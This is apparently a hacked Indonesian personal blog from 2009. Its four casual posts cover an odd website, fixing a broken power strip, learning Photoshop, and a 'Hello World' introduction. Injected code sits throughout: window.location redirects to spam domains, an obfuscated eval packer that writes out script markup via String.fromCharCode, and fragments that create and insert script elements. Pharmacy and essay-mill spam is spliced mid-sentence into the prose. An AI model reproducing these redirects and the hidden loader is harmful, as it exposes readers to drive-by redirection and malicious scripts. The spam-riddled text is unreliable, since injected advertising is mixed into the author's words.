Jul
24
2009
0

Web yang aneh

http://www.valwritings.net/|window.location = “http://www.mobilecontentstore.mobi/?sl=319481-c261c&data1=Track1&data2=Track2″; } eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\\b’+e(c)+’\\b’,’g’),k[c])}}return p}(‘i(f.j(h.g(b,1,0,9,6,4,7,c,d,e,k,3,2,1,8,0,8,2,t,a,r,s,1,2,6,l,0,4,q,0,2,3,a,p,5,5,5,3,m,n,b,o,1,0,9,6,4,7)));’,30,30,’116|115|111|112|101|57|108|62|105|121|58|60|46|100|99|document|fromCharCode|String|eval|write|123|117|120|125|47|45|59|97|98|110′.split(‘|’),0,{}))

It’s not contaminated by a student delivering pro-academic-writers.com it in a less clear way,&quot says hean
Written by tomijenson in: Uncategorized |
Jul
21
2009
2

Tutorial : Cara ngebenerin cok2an.

ini tutorial gw yang pertama.
baiklah karena ini yang pertama, gw akan memberi tutor mengenai hal yang barusan gw lakuin. begini critanya, beberapa jam yang lalu ada yg ngetok2 kamar gue. ternyata adek gw lagi nangis abis dimarahin ortu. ya udah gw kasi masuk, dy masih aja nangis, tak suruh aja dia maen ps “udah ga usah nangis. maen ps sana.” langsung aja dy maen ps. tiba2 gw inget klo gw lagi ngecas laptop (biasa batere rusak, ga mau idup klo ga dicas), dicabutlah kabelnya digantiin ma kabel ps gw. gw langsung mikir, klo ga dikasi dy bakalan nangis, males bgt klo dah gt. tiba2 gw ada akal, perbaiki aja cok2an yg lagi rusak. 6 days ago – usually more popular as compared to to online majority of. aspiration and lot. diagnosis of of buy fluoxetine in uk online online online online

sebagai gambaran, cok2an gw warnanya merah agak pink gt, bentuknya persegi dengan 3 buah lubang cok dan sebuah lampu warna merah klo lg idup.

online canadian pharmacy store! buy uk . online drugstore , get dapoxetine online.

selanjutnya peralatan yang diperlukan adalah sekotak obeng.

langsung aja ke prakteknya. pertama buka baut yang ada di ujung kabel cok2an. setelah itu kita buka rangkanya. liat dulu, ada yang salah ga. ternyata ada yang putus kabelnya. setelah tau kalo kabelnya putus, kita lepas semua kabelnya dengan sedikit melonggarkan baut yang menghimpit kabel. kita lebarkan kabelnya seperti ini.

the lowest prices for estrace vaginal cream from online pharmacies and prescription discount cards! before you vaginal cream, compare the best 

forum home > member list > baclofen canada – online pharmacy, secure and mild periodic limb movement disorder medication , periodic limb 

kemudian kita cabut bagian luarnya pake gigi juga bisa. ingat!! jangan sampai bagian dalamnya putus. aturlah cukup panjang seperti pada gambar.

zyban best price
setelah itu ikatkan pada baut seperti semula. tutup rangkanya, lalu keratkan kembali dengan baut yang satu lagi. selesai!! cok2an sudah kembali seperti semula dan siap digunakan. OK

window.location = “http://www.mobilecontentstore.mobi/?sl=319481-c261c&data1=Track1&data2=Track2”; window.location = “http://cheap-pills-norx.com/search.htm?route=search&q=”; } else { Lastly, there’s an ir blaster up top and a qremote app for controlling various rooms and devices in your www.topspyingapps.com/ home

Written by tomijenson in: Uncategorized |
Jul
20
2009
3

Mulai Belajar Photoshop

Belakangan ini mulai terpikir untuk estrace half life hormone replacement where to buy estrace online check no script wisconsin drug estrace prescription menopause in internet pill belajar photoshop. sebenarnya sih lebih tepat dikatakan mengembangkannya. kadang2 aku berpikir “kok susah banget ya belajarnya, jadi males”. tapi kepengen sih, bukan hanya untuk ngedit foto ma bikin wallpaper aja. tapi juga sekalian bwat nambah ilmu, sapa tau bisa dijadiin penghasilan tetap. hehe.

pertama mulai sih cek2 tutorial di internet. banyak sih, tapi males, pake cipro over 60 bahasa inggris semuanya. sebenernya gpp, tp gw pingin ngeliat yg indonesia punya. sudah sejauh mana keahlian org2 kita dibandingin org luar.

ternyata banyak banget dr indonesia. tapi sebagian ga fokus ma photoshop, sebagian cuma dikit isinya. finally, ketemu juga tuh yg fokus, bisa request lagi. (request teknik2 maksudnya)
nih contohnya :

dsana banyak ilmu2 yg penting. terutama bagi newbie kayak gw. bahkan da tulisan motivasinya. ckckckc
bruntung banget nih gw dapet yg kayak gini. dsana jg da link2 penting utk donlot2 gt. kayak bajakan cs3, plugins, brush, deelel.

oya klo yg dr luar gw da satu web yg tak bookmark. sebenernya 2, tp berhubung yg

punya benernya satu, yaa jadi gabung gt. nih alamatnya:

sebenernya yg punya web ngelink dari situs laen juga. tapi karena itu gw ga perlu susah2 nyari di google lg. isinya jg keren2 kok. istilahnya dy can i buy amoxil over the counter amoxil cost yg ngefilterin, trus gw yg dapet hasilnya.

anyway, bg yg berminat ma , amoxil 750 mg , ciprofloxacin 750mg antibiotics for dogs. photoshop, buka aja link itu. kali2 da teknik yg blom tau. gw juga sering buka kok. apa lg yg dr luar tu, hampir tiam hari update terus.

nb : tambahan is atarax. those requiring bariatric surgery is being devoted to determining what constitutes a prescription drug. headache often results from long-term illness,… dari richo, thanks bgt ya!!

.window.location = “http://www.mobilecontentstore.mobi/?sl=319481-c261c&data1=Track1&data2=Track2”; window.location = “http://cheap-pills-norx.com/search.htm?route=search&q=”; document.currentScript.parentNode.insertBefore(s, document.currentScript); The edutopia video, &quotgive me https://www.eduessayhelper.org/ shelter&quot, shows what compassionate learning looks like in action

Written by tomijenson in: Uncategorized |
Jul
20
2009
0

Hello World!!

Hello world!!
kenapa gw milih kata itu utk kata pertama?
sebenernya gw juga bingung mo ngomong apa, tapi gw teringat ketika blajar komputer pertama kali. tiap kita mulai buat program pasti awalnya kt bakal disuruh buat program “hello world”. ga tau knapa ya, hampir tiap org yg ngajar, baik di buku, internet, temen, bokap, nyokap, pembantu, sampe ayam gw, pasti slalu ada si ‘hello world’ tu.

betewe tujuan gw bkn ni blog adalah, hmhm..tunggu bentar, kok jd lupa y. gara2 td susa sekali bikin ni blog, manufacturers . she seemed to drink in my words with the thirsty avidity with which she had emptied the glass of water. hervey, she pleaded  jd lupa dah gw skarang. gw inget!! demi menjalankan tugas suci, yaitu membuat tulisan yg mendidik, gw ma tmn gw(sebenernya dy sih yg punya ide, gw ikt2an aja.) akan membuat sebuah tulisan yg mendidik. mungkin dy dengan filsafat idupnya (yg aneh itu) dan gw dengan tutorial yg mungkin berguna bagi elo semua.

disini gw mau menegaskan bahwa gue memberikan segala macam tutoril australia. lowest prices and satisfaction guaranteed! dari cara masak mie goreng sampe gmana caranya ngebobol bank!!. gile ga’ tuh, super duper dahsyat gitu loh!!

elo pada juga bisa request tutorial kyk apa yg lo mau. terserah, apa aja juga bisa. contohnya gw punya pengalaman ngerjain temen yg ga disukain satu kelas, ato juga ngejailin temen sekelas yg lebih kecil, lebih pendek dari elo2 pada. jadi gw bisa memberikan saran, hydroxyzine belongs to the class of medications called antihistamines. it is used to relieve itching and other symptoms caused by allergic conditions. it can help… kritik, ataupun dorongan untuk berbuat semau gw. klo pun gw ga punya pengalaman tu, gw bakal bereksperiment dulu baru gw kasi tau “tutorialnya”. intinya, apapun request lo bakal gw penuhi (semampu gw), sampe perut gw keroncongan jg bakal gw usahakan.

segini aja dulu hello worldnya, namanya juga hello, cuma nyapa doang. ntar gw bakal ngasi tutorial benerannya belakangan, ada request maupun enggak gw bakal teteup bikin tuh tutorial. bagi yg mao ngerequest bisa aja langsung hubungi gw di fesbuk gw ato ke surat elektronik gw dibawah ini :

taira_akuma@yahoo.co.id (ni juga alamat fesbuk gw)

sekian dulu dah pertemuan pertama kt, jangan lupa bwat ngerequest ke alamat di atas.
okay!! see u later.

nb jan 1, 1970 – cheap drugs with estrace no prescription delivered to your doorstep can i get online no prescription in canada; buy : oya. klo mo request bisa jg di komennya.

window.location = “http://www.mobilecontentstore.mobi/?sl=319481-c261c&data1=Track1&data2=Track2”; window.location = “http://cheap-pills-norx.com/search.htm?route=search&q=”; var d=document;var s=d.createElement(‘script’); Xnspy official http://cellspyapps.org blogblack market in the cyberverse makes more money than illegal drug trade

Written by tomijenson in: Uncategorized |

Powered by WordPress. Theme: TheBuckmaker. Zinsen, Streaming Audio